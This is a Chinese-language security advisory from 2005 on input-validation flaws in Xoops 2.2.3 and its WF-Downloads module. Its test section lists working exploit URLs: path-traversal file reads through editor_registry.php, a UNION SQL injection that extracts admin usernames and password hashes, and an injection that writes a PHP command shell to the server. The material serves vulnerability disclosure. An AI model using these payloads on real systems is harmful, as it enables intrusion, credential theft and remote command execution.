发布日期：2005-11-14
更新日期：2005-11-14

受影响系统：

Xoops Xoops 2.2.3
Xoops WF-Downloads 2.0.5

描述：

---

BUGTRAQ  ID: 15406
CVE(CAN) ID: CVE-2005-3681,CVE-2005-3680

Xoops是非常流行的动态Web内容管理系统，用面向对象的PHP编写。

Xoops中存在多个输入验证漏洞，远程攻击者可能利用这些漏洞非授权访问文件或操作数据库。


<**>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script
http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0,loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*
http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%20UNION%20SELECT%200,0,0,'<?php%20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/xoops/uploads/shell.php'%20FROM%20fXZ

建议：

---

厂商补丁：

Xoops
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://xoops.sourceforge.net/

浏览次数：2654
严重程度：0（网友投票）